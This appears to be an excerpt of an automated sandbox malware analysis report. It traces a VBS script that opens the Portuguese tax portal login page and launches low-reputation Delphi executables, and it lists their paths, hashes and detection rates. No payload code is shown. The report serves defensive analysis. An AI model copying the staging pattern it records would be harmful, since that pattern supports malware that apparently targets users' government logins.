                                                                                                                  Target ID:0
                                                                                                                  Start time:08:59:46
                                                                                                                  Start date:14/11/2024
                                                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\guia_luqf.vbs"
                                                                                                                  Imagebase:0x7ff7b5ee0000
                                                                                                                  File size:170'496 bytes
                                                                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:1
                                                                                                                  Start time:08:59:47
                                                                                                                  Start date:14/11/2024
                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboard
                                                                                                                  Imagebase:0x7ff76e190000
                                                                                                                  File size:3'242'272 bytes
                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:3
                                                                                                                  Start time:08:59:48
                                                                                                                  Start date:14/11/2024
                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 --field-trial-handle=1976,i,15648558303082770842,9351964472762827409,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                  Imagebase:0x7ff76e190000
                                                                                                                  File size:3'242'272 bytes
                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:5
                                                                                                                  Start time:09:00:06
                                                                                                                  Start date:14/11/2024
                                                                                                                  Path:C:\Users\Public\Termos\artigo.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\users\public\Termos\artigo.exe"
                                                                                                                  Imagebase:0x450000
                                                                                                                  File size:30'932'098 bytes
                                                                                                                  MD5 hash:31DF1F6E455D2A740E1A90E413F9DB68
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:Borland Delphi
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 5%, ReversingLabs
                                                                                                                  Reputation:low
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:8
                                                                                                                  Start time:09:00:24
                                                                                                                  Start date:14/11/2024
                                                                                                                  Path:C:\Intrumental\place.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:c:\Intrumental\place.exe
                                                                                                                  Imagebase:0x6d0000
                                                                                                                  File size:19'375'329 bytes
                                                                                                                  MD5 hash:971CB0CF2672A22241854896998DDE20
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:Borland Delphi
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 17%, ReversingLabs
                                                                                                                  Reputation:low
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:9
                                                                                                                  Start time:09:00:30
                                                                                                                  Start date:14/11/2024
                                                                                                                  Path:C:\Intrumental\lspcv2.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:c:\Intrumental\lspcv2.exe
                                                                                                                  Imagebase:0x1b0000
                                                                                                                  File size:32'891'509 bytes
                                                                                                                  MD5 hash:2047B6AC02B7C454F61D7E90EE1608FE
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:Borland Delphi
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 5%, ReversingLabs
                                                                                                                  Reputation:low
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:10
                                                                                                                  Start time:09:00:39
                                                                                                                  Start date:14/11/2024
                                                                                                                  Path:C:\Intrumental\place.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Intrumental\place.exe"
                                                                                                                  Imagebase:0x6d0000
                                                                                                                  File size:19'375'329 bytes
                                                                                                                  MD5 hash:971CB0CF2672A22241854896998DDE20
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:Borland Delphi
                                                                                                                  Reputation:low
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:11
                                                                                                                  Start time:09:00:47
                                                                                                                  Start date:14/11/2024
                                                                                                                  Path:C:\Intrumental\lspcv2.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Intrumental\lspcv2.exe"
                                                                                                                  Imagebase:0x1b0000
                                                                                                                  File size:32'891'509 bytes
                                                                                                                  MD5 hash:2047B6AC02B7C454F61D7E90EE1608FE
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:Borland Delphi
                                                                                                                  Reputation:low
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:12
                                                                                                                  Start time:09:00:55
                                                                                                                  Start date:14/11/2024
                                                                                                                  Path:C:\Intrumental\place.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Intrumental\place.exe"
                                                                                                                  Imagebase:0x6d0000
                                                                                                                  File size:19'375'329 bytes
                                                                                                                  MD5 hash:971CB0CF2672A22241854896998DDE20
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:Borland Delphi
                                                                                                                  Reputation:low
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:13
                                                                                                                  Start time:09:01:03
                                                                                                                  Start date:14/11/2024
                                                                                                                  Path:C:\Intrumental\lspcv2.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Intrumental\lspcv2.exe"
                                                                                                                  Imagebase:0x1b0000
                                                                                                                  File size:32'891'509 bytes
                                                                                                                  MD5 hash:2047B6AC02B7C454F61D7E90EE1608FE
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:Borland Delphi
                                                                                                                  Reputation:low
                                                                                                                  Has exited:false

                                                                                                                  Disassembly

                                                                                                                  Reset < >

                                                                                                                    Non-executed Functions

                                                                                                                    Function 0000002D79CFBB30 Relevance: .2, Instructions: 180COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2969589376.0000002D79CFA000.00000004.00000010.00020000.00000000.sdmp, Offset: 0000002D79CFA000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_2d79cfa000_lspcv2.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8bc41c436218621be89041d8b7a2e1c058d11f35d7a2bcef4b03cfed61d341d4
                                                                                                                    • Instruction ID: 6e9153f0fbb11754642e65d4ded23193d2e675329029f57caf03594e5e859ffc
                                                                                                                    • Opcode Fuzzy Hash: 8bc41c436218621be89041d8b7a2e1c058d11f35d7a2bcef4b03cfed61d341d4
                                                                                                                    • Instruction Fuzzy Hash: E2510BA680E7C18FD7138BB889796917FB29E27218B0E05CBC4C1CF0E7E25C5859D762